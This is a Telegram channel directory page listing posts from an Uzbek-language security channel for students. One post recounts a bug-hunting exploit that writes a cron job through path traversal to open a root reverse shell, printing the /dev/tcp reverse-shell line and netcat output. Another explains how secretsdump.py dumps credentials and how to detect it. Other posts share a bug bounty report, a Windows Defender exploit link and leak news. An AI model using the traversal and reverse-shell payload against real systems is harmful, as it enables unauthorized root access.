tgindex
SecList for CyberStudents

SecList for CyberStudents

Статистика
@SecListForCyberStudentsанглийский

Think outside the box

Последний пост
15 авг.
Последнее чтение
12 авг.
Постов за неделю
28
Всего постов
163
Тип
открытый
Язык
английский
В каталоге с
12 авг.
Подписчики
1 374
+11 за 4 дн.
Сутки
−1
−0,07%
Неделя
 
Месяц
 
Просмотров на пост
438
40 постов
Вовлечённость
31,9%
к подписчикам
Постов в день
4,0
всего 163
Упоминаний
3
каналов
Охват размещения
оценка
1/24сутки в ленте
417
1/48двое суток
477
1/72трое суток
515

Оценка по просмотрам недавних постов: пост набирает почти всё за первые сутки.

Посты

  • видео или голосовое, без подписи

  • видео или голосовое, без подписи

  • видео или голосовое, без подписи

  • видео или голосовое, без подписи

  • видео или голосовое, без подписи

  • видео или голосовое, без подписи

  • видео или голосовое, без подписи

  • видео или голосовое, без подписи

  • 12 авг.32034из javasec

    Node.js. Webshell befoyda. Lekin...👀 Path traversal orqali RCE olish haqida eshitganmisiz? Bug hunting vaqtida unauth upload function topib oldim. Birinchi narsa — stack tekshirdim. Node.js. Demak webshell yuklashni deyarli foydasi yo'q, ko'pchilik shu yerda to'xaydi va keyingisiga o'tadi. Lekin men filename parametriga e'tibor berdim. Odatda bu parametr serverda fayl nomini belgilaydi. Sanitize qilinmagan bo'lsa — path traversal. Tekshirdim: filename=../../../../../../etc/passwd Server 200 OK javob qaytardi. Xato yo'q. Endi asosiy savol — process qaysi user bilan ishlayapti? Agar www-data bo'lsa /etc ga yoza olmayman. Root bo'lsa — boshqa gap. filename=../../../../../../etc/cron.d/backdoor file body'ga esa: * * * * * root bash -i >& /dev/tcp/x.x.x.x/4444 0>&1 Server 200 OK. Yuklandi. Endi faqat cron daemon ishlayaptimi degan savol qoldi — va u ishlayotgandi. Netcat'ni yoqib 60 soniya kutdim. connect to [attacker] from [target] uid=0(root) gid=0(root) groups=0(root) CVE kerak emas. 0day kerak emas. Webshell ham kerak emas. Faqat sanitize qilinmagan bitta parametr va root sifatida ishlaydigan bitta process. Asosiy muammo kod ichida emas — uni kim yozganida edi.🙂 Telegram📱 Linkedin 📱 Web✈️

  • Let us dive into secretsdump.py's current technical implementation: 1) The RemoteRegistry service is checked. If its not enabled or not started, it is enabled and started. 2) The bootkey is computed by performing registry queries on the SYSTEM\CurrentCon…

  • Let us dive into secretsdump.py's current technical implementation: 1) The RemoteRegistry service is checked. If its not enabled or not started, it is enabled and started. 2) The bootkey is computed by performing registry queries on the SYSTEM\CurrentControlSet\Control\Lsa\[JD|Skew1|GBG|Data] keys. 3 )The SAM and SECURITY hives are saved inside C:\Windows\Temp with a randomly generated name of 8 characters with the .tmp extension. 4) Hives content is read using SMB and the ADMIN$ administrative share. All keys and secrets are decrypted and displayed. 5) Temporary hives are deleted and the RemoteRegistry is reset to its initial state. Detection rule yozayotganda o'ylashingiz mumkin juda ko'p tool yoki attack turlari bo'lsa rule ga bularni qanday moslashtiraman degan savol paydo bo'lishi mumkin! secretsdump misoloda aytish mumkinki uni run qilganda svchost.exe orqali C:\Windows\System32\ ga har doim random nom bilan 8 belgidan iborat .tmp fayl yaratadi. Ruleda shuni detect qil deb yozsak bo'ladi.

  • 12 авг.4621713

    Yoshlarga akalardan chin dildan maslahat )))

  • видео или голосовое, без подписи

  • $12,000 Mozilla Bug Bounty 🤑 Unauthenticated RCE in Taskcluster web-server via GraphQL filter argument (sift $where) https://hackerone.com/reports/3782701

  • Taken from real source

  • 🇰🇿 Qozog‘istonda 15 mln fuqaroning ma’lumotlari darkweb’da sotuvga qo‘yilgani aytilmoqda Darkweb’da 15 millionga yaqin Qozog‘iston fuqarosining ma’lumotlari sotuvga chiqarilgani haqida xabarlar tarqalmoqda. Bu mamlakat aholisining qariyb uchdan ikki qismiga…

  • 12 авг.430313из catseclist

    🇰🇿 Qozog‘istonda 15 mln fuqaroning ma’lumotlari darkweb’da sotuvga qo‘yilgani aytilmoqda Darkweb’da 15 millionga yaqin Qozog‘iston fuqarosining ma’lumotlari sotuvga chiqarilgani haqida xabarlar tarqalmoqda. Bu mamlakat aholisining qariyb uchdan ikki qismiga teng. Qozog‘iston eGov portalida esa 15 milliondan ortiq foydalanuvchi ro‘yxatdan o‘tgan. (Threads) Ma’lumotlarni shymzz13 taxallusli foydalanuvchi 0,5 BTC — taxminan $32 mingga baholagan. Da’volarga ko‘ra, 2,7 GB hajmdagi bazada 47 millionga yaqin yozuv mavjud bo‘lib, ular orasida: • pasport ma’lumotlari; • telefon raqamlari; • elektron pochta manzillari; • ish joyi haqidagi ma’lumotlar; • hujjatlarning skan nusxalari; • parollar mavjud. Eng muhim jihat: sotuvchi ushbu bazani eGov tizimini buzish orqali qo‘lga kiritganini da’vo qilmoqda. Ammo hozircha bu ma’lumotlarning aynan eGov’dan o‘g‘irlangani rasman tasdiqlanmagan. Agar ma’lumotlar haqiqiy bo‘lsa, bu oddiy personal ma’lumotlar sizib chiqishidan ancha jiddiyroq holat. Yana bir muhim nuqta: 47 mln yozuv = 47 mln fuqaro degani emas. Bir fuqaro bo‘yicha bazada bir nechta yozuv mavjud bo‘lishi mumkin. Shu sababli hozircha eng to‘g‘ri ta’rif — Qozog‘iston fuqarolarining katta hajmdagi ma’lumotlari sizib chiqqani haqidagi tasdiqlanmagan da’vo. Agar tasdiqlansa, bu Markaziy Osiyodagi eng jiddiy personal ma’lumotlar xavfsizligi hodisalaridan biriga aylanishi mumkin. PS : Ma'lumotlar yangi yoki eski degan fikr bo'lsa bu hechqanday rol o'ynamaydi. Bu Albatta subyektiv fikrlar

  • видео или голосовое, без подписи

  • https://github.com/MSNightmare/ShieldBreak Windows Defender 0day

  • 11 авг.4871из thehackernews

    🛑 398 fixes. One exploited Windows zero-day. Four unauthenticated 9.8 RCEs. Microsoft’s August Patch Tuesday fixes CVE-2026-68820, which can elevate an attacker with existing code execution to SYSTEM. It also closes the RCE half of a SharePoint exploit chain. Here’s what to patch first ➝ https://thehackernews.com/2026/08/microsoft-patches-398-flaws-including.html

SecList for CyberStudents — tgindex